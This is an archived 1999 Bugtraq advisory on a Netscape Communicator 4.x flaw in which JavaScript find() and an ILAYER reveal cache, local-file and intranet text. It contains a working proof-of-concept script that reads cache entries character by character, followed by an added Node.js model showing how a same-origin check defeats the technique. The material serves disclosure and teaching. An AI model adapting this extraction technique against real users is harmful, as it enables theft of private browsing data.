[9836] in bugtraq
Netscape Communicator find() vulnerabilities
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Mon Mar 8 14:02:10 1999
Date: Mon, 8 Mar 1999 19:48:05 +0200
Reply-To: Georgi Guninski <guninski@HOTMAIL.COM>
From: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG
There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I
guess all 4.x versions are vulnerable)
which allows the following security exploits:
*)Reading the parsed content of local HTML files (by 'parsed' I mean
the text the user sees, not the actual HTML source)
*)Reading the parsed content of HTML files on a web server blocked by a
firewall (the browser and the web server must be on the same side of the
firewall)
*)Reading the user's cache
*)Browsing directories
*)Probably others
The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using an HTML message.
Workaround: Disable JavaScript
Demonstration is available at:
http://www.nat.bg/~joro/nsfind.html
-----------HTML code-------------
MBEGIN
<!-- Embeds the about:cache listing as an inline layer, so its rendered text
     becomes part of this document and is searchable with find() -->
<ILAYER SRC="wysiwyg://1/about:cache">
</ILAYER>
<SCRIPT>
//mag='MBEGIN';
mag='Average cache';   // text known to appear in about:cache; used as the anchor
mend='MEND';           // marker at the very end of this page
res=mag;               // text recovered so far, starting from the anchor
charstoread=100;       // number of characters to recover after the anchor
function readit() {
  for(i=0;i<charstoread;i++) {
    t=res;
    // Move the selection to the MEND marker so the backward search below
    // covers the cache text that precedes it
    find(mend);
    // Try every character code: find(t,caseSensitive,backwards) returns true
    // only if the page contains res followed by that character
    for(c=1;c<256;c++) {
      t=res + String.fromCharCode(c);
      if (find(t,true,true)) {
        // alert(c);
        res=t;         // a match extends the recovered text by one character
      }
    }
  }
  res=res.substring(mag.length);   // drop the anchor, keep what followed it
  alert("The first URL in your cache is: \n" + res);
}
setTimeout('readit();',3000);      // give the ILAYER time to load first
</SCRIPT>
MEND
---------------------------------
Regards,
Georgi Guninski
http://www.nat.bg/~joro
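The post's script relies on find() answering "is this string on the page?" for text the script could not otherwise read. The following Node.js model is an added example, not code from Guninski's post or from Netscape: buildDocument, makeFind, extract and demo are constructed here, the "origin" tags on each text run are a simulation, and the cursor positioning done by find(mend) in the post is approximated with lastIndexOf. It runs the same character-by-character loop against two oracles, one that matches across the embedded layer (the 1999 behaviour) and one that refuses any match touching text from another origin, to show that the fix is in the oracle, not in the loop.

```javascript
// Constructed model: a document is a list of text runs tagged with the origin
// they came from. The attacker's page embeds a layer it is not allowed to
// read, the way the ILAYER in the post embeds about:cache.
function buildDocument(secretText) {
  return [
    { origin: 'attacker', text: 'MBEGIN' },
    { origin: 'victim', text: 'Average cache' + secretText },
    { origin: 'attacker', text: 'MEND' },
  ];
}

// Simplified model of window.find(needle, caseSensitive, backwards).
// enforceOrigin=false: match over the concatenated text of every run,
// regardless of origin. enforceOrigin=true: report a match only if every
// character of the needle lies inside runs owned by the caller's origin.
function makeFind(doc, callerOrigin, enforceOrigin) {
  const runs = [];
  let pos = 0;
  for (const r of doc) {
    runs.push({ origin: r.origin, text: r.text, start: pos });
    pos += r.text.length;
  }
  const full = runs.map(r => r.text).join('');
  return function find(needle, caseSensitive = false, backwards = false) {
    const hay = caseSensitive ? full : full.toLowerCase();
    const ndl = caseSensitive ? needle : needle.toLowerCase();
    // lastIndexOf stands in for "search backwards from the end marker"
    const idx = backwards ? hay.lastIndexOf(ndl) : hay.indexOf(ndl);
    if (idx < 0) return false;
    if (!enforceOrigin) return true;
    // Same-origin check: reject a match that overlaps a foreign run at all
    for (const r of runs) {
      const overlaps = idx < r.start + r.text.length && idx + ndl.length > r.start;
      if (overlaps && r.origin !== callerOrigin) return false;
    }
    return true;
  };
}

// The extraction loop from the post, with the oracle passed in, a query
// counter added, and a break once a character matches.
function extract(find, anchor, charsToRead) {
  let res = anchor;
  let queries = 0;
  for (let i = 0; i < charsToRead; i++) {
    for (let c = 1; c < 256; c++) {
      const t = res + String.fromCharCode(c);
      queries++;
      if (find(t, true, true)) { res = t; break; }
    }
  }
  return { text: res.substring(anchor.length), queries };
}

// Run both oracles over a constructed three-character "cache entry".
function demo() {
  const doc = buildDocument('abc');
  const leaky = extract(makeFind(doc, 'attacker', false), 'Average cache', 3);
  const fixed = extract(makeFind(doc, 'attacker', true), 'Average cache', 3);
  return { leaky, fixed };
}

const result = demo();
console.log('cross-origin oracle :', JSON.stringify(result.leaky));
console.log('same-origin oracle  :', JSON.stringify(result.fixed));
```

With the cross-origin oracle the three characters come back after a few hundred queries; with the same-origin oracle the anchor itself never matches, so nothing is recovered however many queries are spent. The cost per character is bounded by the alphabet size, which is why a boolean primitive that spans an origin boundary is enough to read arbitrary text.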